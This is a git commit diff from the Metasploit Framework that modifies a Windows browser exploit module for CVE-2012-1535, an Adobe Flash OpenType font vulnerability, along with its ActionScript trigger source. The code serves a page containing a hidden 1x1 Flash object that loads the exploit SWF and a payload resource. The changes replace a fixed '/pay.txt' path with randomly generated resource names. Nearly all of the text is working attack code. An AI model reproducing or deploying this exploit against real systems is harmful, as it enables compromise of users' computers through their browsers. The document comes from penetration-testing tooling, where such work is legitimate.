Merge branch 'flash_exploit_r2' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-flash_exploit_r2

2012-08-22 10:00:34 -05:00 · 2012-08-22 10:00:34 -05:00 · 22051c9c2c
parent 1b6fe22359 f715527423
commit 22051c9c2c
4 changed files with 127 additions and 117 deletions
--- a/data/exploits/CVE-2012-1535/Main.swf
+++ b/data/exploits/CVE-2012-1535/Main.swf
--- a/data/exploits/CVE-2012-1535/trigger.swf
+++ b/data/exploits/CVE-2012-1535/trigger.swf
--- a/external/source/exploits/CVE-2012-1535/Main.as
+++ b/external/source/exploits/CVE-2012-1535/Main.as
@ -19,7 +19,8 @@ package {
 		public function Main():void{
 			this.FontClass = Main_FontClass;
 			super();
-            var path:String = "/pay.txt";
+			var source:String = root.loaderInfo.parameters.s;
 			var path:String = "/" + source + ".txt"
 			var urlRequest:URLRequest = new URLRequest(path);
 			urlLoader.dataFormat = URLLoaderDataFormat.TEXT;
 			urlLoader.addEventListener(Event.COMPLETE, urlLoader_complete);
--- a/modules/exploits/windows/browser/adobe_flash_otf_font.rb
+++ b/modules/exploits/windows/browser/adobe_flash_otf_font.rb
@ -8,7 +8,7 @@
 require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
-	Rank = AverageRanking
+	Rank = NormalRanking
 	include Msf::Exploit::Remote::HttpServer::HTML
@ -264,7 +264,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
-		swf_uri = get_resource() + Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf"
+		#swf_uri = get_resource() + Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf"
 		swf_uri = "/#{@resource_name}.txt.swf"
 		html = %Q|
 		<html>
@ -273,6 +274,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		<body>
 		<object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}">
 		<param name="movie" value="#{swf_uri}">
 		<param name="FlashVars" value="s=#{@resource_name}">
 		</object>
 		</body>
 		</html>
@ -284,7 +286,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		proc = Proc.new do |cli, req|
 			on_request_uri(cli, req)
 		end
-		add_resource({'Path' => "/pay.txt", 'Proc' => proc}) rescue nil
+		add_resource({'Path' => "/#{@resource_name}.txt", 'Proc' => proc}) rescue nil
 		print_status("Sending HTML")
 		send_response(cli, html, {'Content-Type'=>'text/html'})
@ -292,12 +294,19 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		@swf = create_swf
-		print_status("SWF Loaded: #{@swf.length.to_s} bytes")
+		@resource_name = Rex::Text.rand_text_alpha(5)
 		vprint_status("SWF Loaded: #{@swf.length.to_s} bytes")
 		datastore['URIPATH'] = datastore['URIPATH'] || random_uri
 		datastore['URIPATH'] = '/' + datastore['URIPATH'] if datastore['URIPATH'] !~ /^\//
 		datastore['URIPATH'] = datastore['URIPATH'][0,3] if datastore['URIPATH'].length > 3
 		vprint_status("URIPATH set to #{datastore['URIPATH']}")
 		super
 	end
 	def create_swf
-		path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-1535", "trigger.swf" )
+		path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-1535", "Main.swf" )
 		fd = ::File.open( path, "rb" )
 		swf = fd.read(fd.stat.size)
 		fd.close
@ -306,7 +315,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def cleanup
 		vprint_status("Removing txt resource")
-		remove_resource('/pay.txt') rescue nil
+		remove_resource("/#{@resource_name}.txt") rescue nil
 		super
 	end